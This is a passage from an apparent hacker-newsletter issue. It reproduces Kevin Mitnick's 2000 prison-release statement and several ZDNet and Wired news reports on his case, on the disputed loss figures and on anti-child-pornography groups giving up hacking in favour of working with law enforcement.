a millionaire by virtue of his libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has become a millionaire by virtue of his libelous and defamatory reporting about me in the New York Times and in his 1991 book "Cyberpunk." On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced allegations about me that were stated as fact, and that even a minimal process of fact-checking would have revealed as being untrue or unproven. In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason, or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted computer criminals." In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't -- that I had broken into the computers at NORAD -- which aren't even connected to any network on the outside -- and that I was a computer "vandal," despite the fact that I never damaged any computer I've ever accessed. Mr. Markoff even claimed that I was the "inspiration" for the movie "War Games," when a simple call to the screenwriter of that movie would have revealed that he had never heard of me when he wrote his script. In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr. Markoff's authorship of the book "Cyberpunk." Mr. Markoff also failed to disclose in any of his articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote about me. Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto government agents in my arrest, in violation of both federal law and jounalistic ethics. They were both present when three blank warrants were used in an illegal search of my residence and my arrest, and yet neither of them spoke out against the illegal search and illegal arrest. Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal, and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence. My case is a case of curiosity -- I wanted to know as much as I could find out about how phone networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything. Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or reveal the names of the companies involved in the case. Have you ever heard of a fraud case where the prosecutors attempted to coverup the existence of the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of the loss in this case, to exaggerate the alleged harm, to cover up information about the companies involved, and to solicit the companies involved in this case to provide falsified "damages" consistent with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the New York Times. Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from my personal reputation to the ability of my defense attorney to file motions on time, and even to the extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this case to obstruct justice at every turn, to use the unlimited resources of the government and the media to crush a defendant who literally had no assets with which to mount a defense. The fact of the matter is that I never deprived the companies involved in this case of anything. I never committed fraud against these companies. And there is not a single piece of evidence suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in this case would have offered me a plea bargain? Of course not. But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights without the cooperation of the United States federal court system. As far as we know, I am the only defendant in United States' history to ever be denied a bail hearing. Recently, Mr. Painter claimed that such a hearing would have been "moot," because, in his opinion, the judge in this case would not have granted bail. Does that mean that the judge in this case was biased against me, and had her mind made up before hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine which Constitutional rights defendants will be permitted to have, and which rights they will be denied? The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial standard whatsoever, and routinely refused to order the prosecutors to provide copies of the evidence against me for nearly four years. For those of you who are new to this case, I was held in pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I was never permitted to see the evidence against me, because the prosecutors obstructed our efforts to obtain discovery, and the judge in this case refused to order them to produce the evidence against me for that entire time. I was repeatedly coereced into waiving my right to a speedy trial because my attorney could not prepare for trial without being able to review the evidence against me. Please forgive me for taking up so much of your time. The issues in this case are far more important than me, they are far more important than an unethical reporter for the New York Times, they're far more important than the unethical prosecutors in this case, and they are more important than the judge who refused to guarantee my Constitutional rights. The issues in this case concern our Constitutional rights, the right of each and every one of us to be protected from an assault by the media, and to be protected from prosecutors who believe in winning at any cost, including the cost of violating a defendant's fundamental Constitutional rights. What was done to me can be done to each and every one of you. In closing, let me remind you that the United States imprisons more people than any other country on earth. Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank you all for your interest and your support. @HWA 24.1 More submitted Mitnick articles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributions by Zym0t1c Hacker Mitnick released Friday For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html Read the (fine but short) dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462 Since this is *big* news, you can stay here and read the ASCII-version: Hacker Mitnick released Friday By Kevin Poulsen, ZDNet News UPDATED January 21, 2000 9:30 AM PT For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future. The 36-year-old hacker was greeted at the gate by friends and family members. His mother will drive him to Los Angeles, where his first order of business will be to obtain a driver's license, report to his new probation officer and see a doctor about injuries he suffered in a prison bus accident last year. "He's having neck pains, and back and shoulder pains," said Reba Vartanian, Mitnick's grandmother. "He hasn't had a regular doctor in five years." A free man for the first time since 1995, he will live in the Los Angeles suburb of Westlake Village with his father, Alan Mitnick, a general contractor. Less clear is what Mitnick is going to do for a living. Under court order, the hacker is banned for three years from using any kind of computer equipment without the prior written permission of his probation officer -- a restriction that even the court acknowledged would affect his employability. "He's experiencing a lot of frustration over the things he can't do," said Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free Kevin" grass-roots movement. "Keep in mind this is someone who's been kept away from these things for five years, and when he gets out he won't even be able to touch them." Does incarceration cure an addict? The restrictions, and long history of recidivism, make one former friend and partner-in-crime pessimistic about Mitnick's future. "Do you cure a drug addict or alcoholic by incarceration on its own?" asked Lew DePayne, rhetorically. "Do you cure him by taking away his ability to earn a living?" Mitnick and DePayne became friends in the late 1970s, when they were both teenagers. Together, they explored and manipulated the telephone network as Los Angeles' most notorious "phone phreaks." In the 1980s, DePayne seemingly dropped out of the scene, while Mitnick moved on to corporate computers and networks, developing a penchant for cracking systems in search of proprietary "source code," the virtual blueprints for a computer program or operating system. Mitnick had already been in a series of minor skirmishes with the law when, in 1989, he suffered his first adult felony conviction for cracking computers at Digital Equipment Corp. and downloading source code. He served one year in federal custody, followed by three years of supervised release. In 1992, Mitnick was charged with a violation of his supervision for associating with DePayne again. He went underground and online, using the Internet to crack computers belonging to such cell phone and computer makers as Motorola (NYSE: MOT), Fujtsu and Sun Microsystems (Nasdaq: SUNW) and to copy more proprietary source code. The FBI captured him on Feb. 15, 1995, when computer security expert Tsutomu Shimomura suffered an attack on his machine and responded by tracking Mitnick to his hideout in Raleigh, N.C. Shimomura and New York Times reporter John Markoff went on to write the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It." Shimomura and Markoff sold the movie rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since shooting wrapped on the project in December 1998 the movie has languished on the shelf with no known theatrical release date, surrounded by swirling rumors of a direct-to-video or cable TV release. Miramax publicists didn't return telephone inquiries about the project. Mitnick's arrest began a series of courtroom battles over procedures and evidence that finally ended last year in a plea agreement. The hacker pleaded guilty in March 1999 to seven felonies and admitted to his Internet hacking. In August 1999, Judge Marianna Pfaelzer sentenced him to 46 months in prison, on top of an earlier 22 months sentence for the supervision violation and cell phone cloning. With credit for his lengthy period of pretrial custody, and some time off for good behavior, Mitnick's served just under five years in prison. "My sincere hope is that he gets his act together and complies with the conditions of his supervised release and doesn't engage in further hacking activity," said Assistant U.S. Attorney Christopher Painter, one of Mitnick's two federal prosecutors. Painter's work on the Mitnick case helped propel him to a position as deputy chief of the U.S. Department of Justice's computer crime and intellectual property section in Washington, D.C. He begins at the DOJ in March. "I think that the significance of this case is that he was so prolific. He not only had done this once before, but he did it on such a large scale," Painter said. "If past ends up being prologue, then certainly we'll go back to court and deal with it at that time." From hacking to ham? Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future for the hacker, perhaps with a job that exploits his famous ability to "social engineer" people into doing his bidding. "I think he's had a number of different offers to kind of do PR-type of work," said Vinson, who also points out that Mitnick might still get a computer job. "You have to remember the order says, 'Without the prior express permission of the probation office.' So it's not absolutely prohibited." If Mitnick can't use computers, he reportedly hopes to indulge his love for technology by returning to amateur radio, a childhood passion. Federal Communications Commission records show that Mitnick's license expired last month. According to Kimberly Tracey, a ham radio operator in Los Angeles and a friend of Mitnick's, he's been scrambling to renew it. "This is going to be part of Kevin's life, because they've taken away computers and everything else," said Tracey. "I hope they don't take away this." Mitnick was unavailable for comment on his imminent release. Sources close to the hacker say he granted the CBS news show "60 Minutes" an exclusive interview last week, which is scheduled to air Sunday. But in an interview with ZDNet News last July, Mitnick complained about his treatment by the government prosecutors, who he said were "grossly exaggerating the losses in the case and the damages I caused." (See: Mitnick says, "I was never a malicious person.") DePayne: Anger a major stumbling block DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's anger will work against him in his new life. "I don't know if that's ever going to go away; I don't know if he'll be able to deal with it," said DePayne, speaking from his home in Palo Alto. Calif., where he's serving six months house arrest for aiding Mitnick's hacking during his fugitive years. "That's going to be a major stumbling block for him going forward." DePayne said he last heard from Mitnick the night of his arrest, on a message left on his answering machine. Now 39 years old, divorced and heading a small Internet company of his own, DePayne insists he doesn't plan on associating with the impish hacker he first met as a brash teenager two decades ago. "I can't be fooling around with these stunts and practical jokes that Kevin might want to fool around with," said DePayne. "I'll miss Kevin. I won't miss the trouble he brings to the table." Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's CyberCrime. ____________________________________________________________________________ Mitnick: I was manipulated That's how hacker Kevin Mitnick feels after almost five years behind bars. Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop Since this is *big* news, you can stay here and read the ASCII-version: Mitnick: I was manipulated By Robert Lemos, ZDNet News UPDATED January 21, 2000 3:41 PM PT Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years. "Prosecutors ... manipulated every aspect of this case from my personal reputation, to the ability of my defense attorney to file motions in time, and even to the extent of filing a 1,700-item exhibit list immediately before a trial," said Mitnick, reading from a three-page statement to reporters gathered near the Lompoc, Calif. prison facility, minutes after being released from the medium-security prison. Almost five years ago, federal authorities arrested Mitnick on a 25-count indictment relating to misuse of Pacific Bell equipment for illegal wiretaps and copying proprietary source code from Motorola, Sun Microsystems Inc., NEC Corp. and Novell, among others. "My case is one of curiosity," said Mitnick. "There was no intent to defraud anyone of anything." New York Times' reporter John Markoff covered the latter portion of the two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article called him "Cyberspace's most wanted." Mitnick blames the hype surrounding his elusive flight from authorities and his subsequent arrest on Markoff's article. In addition, the 36-year old ex-hacker claims that Markoff crossed the line by bringing authorities and computer expert Tsutomu Shimomura together to track him down. Mitnick went as far as to call the article libelous and defamatory. In a Friday morning interview, Markoff stood by his reporting, saying that the allegations were "really disappointing to me because it suggests that in the past five years, and perhaps in the last 20 years, Kevin has not learned anything. What he might have learned from all his time in prison is that it is wrong to break into other people's computers. I don't think it is anymore complex than that." Markoff pointed out that Mitnick had been arrested five times in the last 20 years for computer-related crimes. "The problem is, and the reason the judge kept him away from computers, (is that) this is the fifth time that he has been arrested. It's not like they haven't given him chances," said Markoff. Markoff also denied any ethical breach. "I won't get into the specifics on those three cases," Markoff said. "I want to say that I stand by my story, and to note that it was written while Kevin was a fugitive from four law enforcement agencies, and that's why it was written." In court, Mitnick also claims he didn't get a fair shake. Looking tired and much thinner than five years ago, the bespectacled cybercriminal blamed prosecution for blocking his defense from acting on his behalf. "Their method (in) this case was to manipulate the amount of loss to exaggerate the alleged harm," he said. "I've acknowledged since my arrest in February, 1995, that the actions I took were illegal, and that I committed invasions of privacy. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence." Damages 'grossly inflated' In total, the prosecution estimated damages at $80 million by including the full R&D costs of the applications and source code that Mitnick copied, even though none of the code was ever sold to another company or is known to have been used by a competitor. "Everybody realizes that those (estimates) were greatly inflated," said Jennifer Granick, a San Francisco defense attorney, who represented hacker Kevin Poulsen in litigation following that hacker's release from prison. (Poulsen is a ZDNet News contributor.) The number may sound familiar. That's because David L. Smith, who plead guilty to writing and releasing the Melissa virus in December, similarly admitted to the prosecutor's assessed damages of $80 million. It's no coincidence: Under federal law that is the maximum amount accounted for by sentencing guidelines. In fact, it is usually the major factor in determining the length of jail time. That leads to a skewed pursuit of justice, said Granick. "The criminal courts are here to deal with societal wrongs," she said. "It is not their primary purpose to recompense the victims." "I hope that the Kevin Mitnick case is the last case of the great '80s hacker hysteria," she continued. "I hope that we won't have the same kind of hype in the future so that people can get a fair shake in the media and in court." The U.S. Attorney's office could not comment by press time. Kevin Poulsen contributed to this report. ____________________________________________________________________________ The case of the kung fu 'phreak' Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html Since this is *big* news, you can stay here and read the ASCII-version: The case of the kung fu 'phreak' Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked. By Kevin Poulsen, ZDNet News January 21, 2000 11:59 AM PT Two days after computer security expert Tsutomu Shimomura suffered the now-legendary Christmas Day 1994 hack-attack that launched his search for Kevin Mitnick, a mysterious message left on his voice mail box added real-world menace to the cyberspace crime. "Damn you, my technique is the best," said an odd voice in a faux-British accent. "I know sendmail technique, and my style is much better ... Me and my friends, we'll kill you." Three days later the caller left another message, this time beginning with a kung fu scream and affecting the voice of an actor in a martial arts film: "Your security technique will be defeated. Your technique is no good." In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he called "grasshopper," for mentioning the messages in a Newsweek article on the intrusion and for putting digitized copies on the Internet. "Don't you know that my kung fu is the best?" The taunting phone calls were presumed to be from Shimomura's intruder, and they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized copies can be found on the official Web site for Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It." The equation of hacking with kung fu fighting has become a cultural touchstone in its own right, and on more than one occasion the "Lone Gunmen" hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the best." The real kung fu 'phreak' The only problem is, the thinly disguised voice never sounded at all like Kevin Mitnick, and two of the messages came after the hacker had been arrested. "I heard that this guy named Shimomura had been hacked ... So I just thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke Shif. "I used to watch kung fu movies a lot." Under the handle "SN," Shif once had a solid reputation in the computer underground as a "phone phreak" (i.e., phone hacker). But he says that, by 1995, his fear of "The Man" had long since scared him straight; he simply succumbed to the temptation to make some prank phone calls. "I thought I'd be funny," says Shif, who like many hackers from the early 1990s has gone on to work in the computer security trade, for Virginia-based Network Security Technologies Inc. The matter became less amusing when Shif read the news reports on Feb. 15, 1995. "I found out Mitnick got caught, and they were trying to link that to the voice mail," says Shif, who responded by calling Shimomura again. "I left a pre-emptive messages, saying, listen, this has nothing to do with any Mitnick or anything, I'm just making fun of kung fu movies." And this time, he didn't call him grasshopper. ____________________________________________________________________________ Mitnick Released Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment. Read the article online at: http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html Since this is *big* news, you can stay here and read the ASCII-version: Mitnick Released Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment. By Iolande Bloxsom January 21, 2000 Convicted hacker Kevin Mitnick was released early this morning from federal prison in Lompoc, California. Possibly the most famous hacker ever, Mitnick was arrested in February of 1995, and has spent almost five years in prison. In a prepared statement, Mitnick had harsh words for both the media and federal prosecutors, both of whom he blamed for his long incarceration. The media "grossly misreported" his case and created what he called the "villain of the month." He also railed against the media for "defin[ing] what is 'acceptable discussion'." Mitnick singled out John Markoff, a reporter for The New York Times, accusing him of "libelous and defamatory reporting-- and I use the word reporting in quotes." He charged that Markoff's articles had facts that were untrue, that were unproven, and that Markoff failed to disclose a previous relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with Katie Hafner in 1995.) Finally, Mitnick claimed that the journalist "is a millionaire" now because of his reporting on the convicted hacker. In a later interview with ZDTV's Janet Yee, Markoff said he stood by his reporting. However, Mitnick had equal censure for prosecutors David Schindler and Christopher Painter, who, he claimed "went as far as holding me in solitary confinement," to try to force him to plead guilty. He says, though, that his crime was one of trespass, rather than fraud. "I never deprived company's of anything... there was never any evidence of fraud." Mitnick pleaded guilty on March 26, 1999, to seven felonies, including unauthorized intrusion into computers at cellular telephone companies, software manufacturers, ISPs, and universities. He also admitted to illegally downloading proprietary software from some of these companies. In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46 months in prison and ordered him to pay $4,125 in restitution. She also ordered Mitnick not to touch a computer or cellular phone without written approval from his probation officer. The sentence, governed by a plea agreement between Mitnick and his prosecutors, ran on top of the 22 months he already received for cell-phone cloning and a probation violation, for a total of 68 months. With credit for his lengthy pretrial custody and some time off for good behavior, Mitnick served just less than five years in prison. Mitnick is headed back to Los Angeles, where his family lives. By Iolande Bloxsom January 21, 2000 ____________________________________________________________________________ Mitnick's Digital Divide /* This is news from two weeks ago, but still a headline */ It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991. Read the online article at: http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.htm l Since this is *big* news, you can stay here and read the ASCII-version: Mitnick's Digital Divide It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991. By Kevin Poulsen January 12, 2000 On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet. These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++. Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots. "We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick. Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager. So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life. I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns-- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry. Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!" The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers. Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start. January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide. ____________________________________________________________________________ Mitnick: 'I was never a malicious person' /* This is news from a few months ago, but still a headline */ Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.' Read the online article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla Since this is *big* news, you can stay here and read the ASCII-version: Mitnick: 'I was never a malicious person' Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.' By Kevin Poulsen, ZDNet News July 30, 1999 4:36 PM PT Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim proves the government was guilty of misconduct while building its case against the hacker. The goal, says Mitnick in a rare interview, is to clear his name. "At the beginning of this case the federal government manipulated the facts to allege losses that were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its merits, it will clear me publicly of the allegations that I caused these significant losses." The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case that's remained unusually acrimonious, considering that both sides reached a plea settlement in March. Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell phone cloning and an earlier supervised release violation. Mitnick vexed by 'snowball effect' The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than $80 million the government quoted to an appeals court last year, when it successfully fought to hold the hacker without bail. That figure, though no longer promulgated by prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that began with a 1994 front-page article in the New York Times. "Because of this assault that was made upon me by John Markoff of the New York Times, then the federal government grossly exaggerating the losses in the case and the damages I caused, I have a desire to clear my name," Mitnick said. "The truth of the matter is that I was never a malicious person. I admit I was mischievous, but not malicious in any sense." Markoff reported on Mitnick for the New York Times, and went on to co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's supporters, and raised eyebrows with a handful of journalists. Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the early 1980s, a claim that was recycled as recently as last May by another New York Times reporter. "I never even attempted to access their computer, let alone break into it," Mitnick said. "Nor did I do a host of allegations that he says I'm guilty of." For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who told me that. I was not the first person to report it, nor the only person to report it." Government collusion? The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim companies on how to artificially inflate their losses. The filing is based on documents Randolph subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick downloaded, and to keep the figure "realistic." Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to license the Unix operating system. Six other companies responded, using software development costs as the primary calculus of loss. The total bill came to $299,927,389.61, significantly more than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing. "At the beginning of this litigation, the government misrepresented to the federal judiciary, the public and the media the losses that occurred in my case," Mitnick said. To Randolph, it all smacks of collusion. "What comes out from the e-mails that we have, is that the so-called loss figures solicited by the government were research and development costs at best, fantasy at worst," he said. "I would classify it as government manipulation of the evidence." However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous." "What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the methodology, in terms of what is to be included in loss amounts, that direction is something we often provide because we're aware of what components are allowable under law, and which components are not," he said. Schindler said development costs are a valid indicator of victim loss, but acknowledges that putting a dollar figure on software can be difficult. Mitnick claims cover-up Mitnick and his attorney both say there's more to the story, but they can't talk about it. At Mitnick's last court appearance on July 12, the judge granted a government request that any filings relating to victim loss be sealed from the public. "As much as the government would like to, you can't take the recipe for ice and file it under seal and have it become confidential," said Mitnick, who, along with his attorney, is challenging the confidentiality of the loss information, and asking for the motion to be unsealed. Mitnick claims he smells a cover-up. "The government should not be permitted to bury the truth of the case from the public and the media by seeking and obtaining a protective order to essentially force me to enter a code of silence," he said. "Our only concern, as it has been from day one, is the protection of the victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass, embarrass and abuse them remains a mystery to us, but it's something that we will continue to oppose vigorously." Although the software costs are no longer being used against his client, Randolph claimed that by "manipulating the loss figures," the government raises the issue of whether even the more modest $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to explore the matter, and asking that Mitnick be released on a signature bond pending that hearing. And if Mitnick winds up owing money anyway? "We're asking for sanctions that the government pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated to a halfway house for the government's misconduct in this case." Excerpt of the Sun documents are available on the Free Kevin Web site, maintained by members of a tireless grass-roots movement that's protested the hacker's imprisonment for years. "I'd like to sincerely thank all my friends and supporters for all the support they've given me over this long period of time," Mitnick said. "I'd like to thank them from my heart." Kevin Poulsen writes a weekly column for ZDTV's CyberCrime. @HWA 25.0 Hackers vs Pedophiles, taking on a new approach. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/print/0,1294,33869,00.html Hackers' New Tack on Kid Porn by Lynn Burke 3:00 a.m. 3.Feb.2000 PST Kent Browne used to spend most of his free time hacking Web sites, erasing hard drives, disabling servers, and knocking folks out of chat rooms. Like many hackers, he subscribed to the classic Machiavellian argument, that the end justifies the means -- especially when the end was eradicating child pornography on the Internet. In early December, he and some fellow hackers from New York to Australia started a group called Condemned, and announced their intention to take down child pornographers by any means necessary. But when Browne, 41, talked to Parry Aftab, an attorney who heads the biggest and most well-known of the anti-child pornography groups -- Cyber Angels -- he had a sudden change of heart. "She said that the one problem we would have would be with law enforcement. If they knew we were doing illegal stuff, they wouldn't touch us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've got two kids. And I don't want to take any chances." So now he and the rest of Condemned's loosely organized volunteers use specially designed software and good old-fashioned Internet search engines to ferret out the bad stuff and tip off federal agents in the U.S. Customs Service and the FBI. They're not alone. Natasha Grigori and her volunteer staff at antichildporn.org have also decided to hang up their hacking shoes. At her old organization, Anti Child Porn Militia, Grigori was dedicated to the use of hacking to disable child pornography Web sites. "We started out very angry, we started out very militant," she said. But a trip to Def Con in Las Vegas made her change her mind. She started talking with people on the right side of the law, and they told her they supported her cause, but not her means. "You can't stop a felony with a felony," she says now. But the decision to go "legal" was a difficult one, and she lost most of her volunteer hackers. "Less than a dozen out of 250 stuck with us," she said. "They didn't like the idea. They just thought we could rip and tear." Browne also says he had a hard time leaving the hacking behind, mostly because he thought it was right. "Which is more illegal? Having children's pictures on the Internet or hacking down the servers?" he asked. "Morally, I felt I was right." But morals don't make hacking the right way to eliminate child pornography, according to Aftab, the author of The Parent's Guide to Protecting Your Children in Cyberspace. She says hacking complicates the fight and casts a cloud over groups like hers that work closely with law enforcement. "We need help but we need the right help," she said. When a site is taken down off the Web, it turns up somewhere else, usually within minutes, she said. And if a server is destroyed, so is the evidence of the person behind it. "I'd frankly love to able to do all kinds of things to these groups," she said. "You can't let your gut reaction dictate how you react to a disgusting situation." Getting a gauge on the prevalence of child pornography is difficult. Experts say that most of the images of child pornography are downloaded from newsgroups and traded in secret email clubs. Aftab says true child pornography -- the kind that features children who are very young -- isn't very easy to stumble across on the Web. It takes some digging, she says, for her volunteers to find about 150 new sites each month. And the reason a group like hers is necessary, she says, is that the technological savvy of the law enforcement is lacking. "When the total technology behind the cops is that one guy uses AOL at home, it's kind of hard to do cyber-forensics," she said. Grigori said she recently asked a federal agent to come to her office for a meeting to talk about the problem. "The one fed looked at my computer like it was a toaster," she said. "I asked him for his email address, and he said, 'I don't have a computer.'" The former deputy chief of the Child Exploitation Unit at the Department of Justice, Robert Flores, also says the government isn't doing its part. Flores has had years of experience tracking down child pornographers and pedophiles, both online and off. But he didn't think he could get his job done as a government employee. "I got to the point where I thought I could do more for families and kids outside of the Justice Department," he said. Flores is now the senior counsel for the Fairfax, Virginia-based National Law Center for Children and Families, a legal resource center for child pornography. "One of the things the Justice Department has failed to do is say that the law applies on the Internet, that the Internet is not a lawless place," he said. The laws forbidding child pornography are fairly new. The Supreme Court first ruled in New York v. Ferber in 1982 that child pornography was not protected by the First Amendment. The decision said the government could ban sexual images with serious literary or artistic value in the interest of preventing "the harmful employment of children to make sexually explicit materials for distribution." Two years later, the justices said the government could outlaw not just the distribution but also the possession of child porn. And it is only in the last few years that the Internet has played a role in laws and statutes governing pornography in general, and child pornography in particular. There is currently a schism within the legal community over the definition of child pornography, and whether it should include computer-generated photographs or computer-enhanced photographs that appear to feature children engaged in sex acts, but actually contain adults. But while the courts hammer out the issues, some say citizens shouldn't take matters into their own hands. Flores likened the Internet 